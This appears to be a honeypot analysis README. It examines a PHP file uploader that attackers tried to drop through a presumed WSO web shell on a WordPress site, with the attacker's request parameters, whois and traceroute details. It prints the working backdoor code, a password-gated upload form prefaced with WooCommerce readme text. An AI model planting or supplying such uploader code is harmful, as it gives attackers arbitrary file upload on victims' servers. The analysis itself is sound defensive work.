Skip to content

Latest commit

 

History

History

canshu

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
154.48.243.123XHNOqcveF-qdhdBRjMorxAAAAAM.0.file
154.48.243.123XHNOqcveF-qdhdBRjMorxAAAAAM.0.file
 
 
154.48.243.123XHNOqcveF-qdhdBRjMorxAAAAAM.wso.scans
154.48.243.123XHNOqcveF-qdhdBRjMorxAAAAAM.wso.scans
 
 
README.md
README.md
 
 
dc1.php
dc1.php
 
 
f1.php
f1.php
 
 
sessions.php
sessions.php
 
 

README.md

File Uploader with weird IP address

Simple file uploader with strange whois information.

At least one other analysis of this uploader appears on the web.

Download

The attacker(s) seem to have believed they were accessing a WSO (Web Shell by oRb) web shell. The requested a URL ending in /wp-content/themes/twentytwelve/404.php, a common spot for "hidden" web shells and backdoors to reside. The HTTP POST request came with parameters typical for WSO:

Name Value
a FilesMAn
c /var/www/html/wp-content/themes/twentytwelve/
p1 uploadFile
charset Windows-1251

The "a" parameter even has the odd "FilesMAn" camel-case that appears in lots of WSO source.

The file was named "gan.php" on the attacker(s) machine.

This particular WSO access had a cookie that WSO accepted as meaning "previously logged in".

The attacker logged in with a password of "w" 29 seconds earlier. This was probably a manual install, with a browser driver by a human user. The IP address asked for favicon.ico and the purported WSO URL immediately before this download.

The downloader identified itself as "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:65.0) Gecko/20100101 Firefox/65.0"

p0f3 identified the IP address as running "Windows 7 or 8", so the user agent string reconciles.

IP Address 154.48.243.123

whois says that it's a Cogent IP address, but the AfriNIC Whois server answers, which is weird.

% This is the AfriNIC Whois server.
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/resources/registry/whois/tou/

NetRange:       154.48.0.0 - 154.48.255.255
CIDR:           154.48.0.0/16
NetName:        COGENT-154-48-16
NetHandle:      NET-154-48-0-0-1
Parent:         NET154 (NET-154-0-0-0-0)
NetType:        Direct Allocation
OriginAS:       AS174
Organization:   PSINet, Inc. (PSI-2)
RegDate:        1992-02-05
Updated:        2017-10-30
Ref:            https://rdap.arin.net/registry/ip/154.48.0.0

traceroute has a route from Denver, CO, US through cogentco.com addresses, on to a set of NTT.com (Japanese telecom) IP addresses,

traceroute to 154.48.243.123 (154.48.243.123), 30 hops max, 60 byte packets
 1  blahblah (612.624.54.912)  62.843 ms  62.827 ms  62.778 ms
 2  10.100.100.2 (10.100.100.2)  62.755 ms  62.921 ms  62.694 ms
 3  te0-0-1-1.nr11.b004491-1.den01.atlas.cogentco.com (38.122.238.45)  65.324 ms  65.302 ms  77.824 ms
 4  te0-0-2-2.nr11.b006545-1.den01.atlas.cogentco.com (154.24.53.101)  87.984 ms  87.969 ms  87.925 ms
 5  te0-0-1-2.agr14.den01.atlas.cogentco.com (154.24.17.121)  87.883 ms te0-0-2-1.agr12.den01.atlas.cogentco.com (154.24.13.53)  87.861 ms te0-0-1-2.agr13.den01.atlas.cogentco.com (154.24.17.117)  87.803 ms
 6  te0-7-0-2.ccr22.den01.atlas.cogentco.com (154.54.30.229)  87.754 ms te0-7-0-11.ccr22.den01.atlas.cogentco.com (154.54.31.125)  40.248 ms te0-7-0-2.ccr22.den01.atlas.cogentco.com (154.54.30.229)  40.188 ms
 7  be3035.ccr21.mci01.atlas.cogentco.com (154.54.5.90)  72.882 ms be3036.ccr22.mci01.atlas.cogentco.com (154.54.31.90)  72.841 ms be3035.ccr21.mci01.atlas.cogentco.com (154.54.5.90)  78.145 ms
 8  be2433.ccr32.dfw01.atlas.cogentco.com (154.54.3.213)  75.335 ms be2432.ccr31.dfw01.atlas.cogentco.com (154.54.3.133)  75.280 ms be2433.ccr32.dfw01.atlas.cogentco.com (154.54.3.213)  75.261 ms
 9  be2764.ccr41.dfw03.atlas.cogentco.com (154.54.47.214)  89.879 ms  89.816 ms be2763.ccr41.dfw03.atlas.cogentco.com (154.54.28.74)  89.809 ms
10  ae-5.r10.dllstx09.us.bb.gin.ntt.net (129.250.9.205)  89.784 ms  89.743 ms  89.888 ms
11  ae-0.r23.dllstx09.us.bb.gin.ntt.net (129.250.5.5)  89.861 ms  89.835 ms  56.434 ms
12  ae-8.r23.snjsca04.us.bb.gin.ntt.net (129.250.4.154)  81.747 ms  81.469 ms  84.352 ms
13  ae-21.r30.tokyjp05.jp.bb.gin.ntt.net (129.250.5.77)  189.215 ms  189.151 ms  189.145 ms
14  ae-4.r24.tkokhk01.hk.bb.gin.ntt.net (129.250.2.51)  236.345 ms  295.354 ms  298.360 ms
15  ae-1.r03.tkokhk01.hk.bb.gin.ntt.net (129.250.6.98)  298.339 ms  298.282 ms  298.272 ms
16  ae-2.a01.newthk03.hk.bb.gin.ntt.net (129.250.6.125)  290.508 ms ae-1.a01.newthk03.hk.bb.gin.ntt.net (129.250.5.253)  290.493 ms ae-2.a01.newthk03.hk.bb.gin.ntt.net (129.250.6.125)  290.426 ms
17  xe-0-0-19-2-381.a01.newthk03.hk.ce.gin.ntt.net (192.80.17.90)  293.034 ms  267.935 ms  255.536 ms
18  * * *
19  * * *
20  154.48.243.123 (154.48.243.123)  222.118 ms  222.107 ms  217.720 ms

Notice the big jump in response times between ae-8.r23.snjsca04.us.bb.gin.ntt.net (129.250.4.154), and ae-21.r30.tokyjp05.jp.bb.gin.ntt.net (129.250.5.77). The great circle distance from San Jose to Tokyo is 5186 miles, so speed-of-light lag is only about 0.03 seconds, or 30 milliseconds. The next big jump in time is from ae-21.r30.tokyjp05.jp.bb.gin.ntt.net to ae-4.r24.tkokhk01.hk.bb.gin.ntt.net, which conveniently has "tkokhk01", "Tokyo to Hong Kong" probably, in its name.

ipaddres.is puts it on a penninsula on a lake near Hutchinson, KS, USA.

I don't think there's anything nefarious here, just that NTT isn't doing a great job of publicizing where its IP addresses live. I also think that Cogent has sold/leased a block of IP addresses to someplace in Hong Kong. The record keeping doesn't seem to have caught up.

Analysis

This uploader protects itself by only functioning if a HTTP GET request includes the string ?login=canshu in the URL.

Even a pretty-printed version of this uploader is small enough to include directly:

=== WooCommerce ===
Contributors: automattic, mikejolley, jameskoster, claudiosanches, claudiulodro, kloon, rodrigosprimo, jshreve, coderkevin
Tags: ecommerce, e-commerce, store, sales, sell, shop, cart, checkout, downloadable, downloads, paypal, storefront, woo commerce
what times wordpress
<?php 
if ($_GET["login"] == "canshu") {
    if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
        echo '<b>Upload Complate !!!</b><br>';
    }
    echo '<form action="" method="post" enctype="multipart/form-data"><input type="file" name="file" size="50"><input type="submit" value="submit"/></form>';
}

This code has some weird aspects. The PHP interpreter will print the small block of pure ASCII text just before the <?php tag on every access. At first, I thought this was a Google "dork", some chunk of text that Google would index, and attacker(s) could find with a simple search. As of 2019-03-02, this downloader does exist in some Russian-language web pages. You can find it using the block of text. But downloaders are not the most common thing you find using the block of text. You get many more hits on plain Woo Commerce installs. The block of text also appears in readme.txt files in Woo Commerce plugin installs. I don't know what to make of the inclusion of that chunk of text.

It also generates incomplete HTML: there's no <html> or <body> tags around the HTML <form> it outputs. This is just shoddy.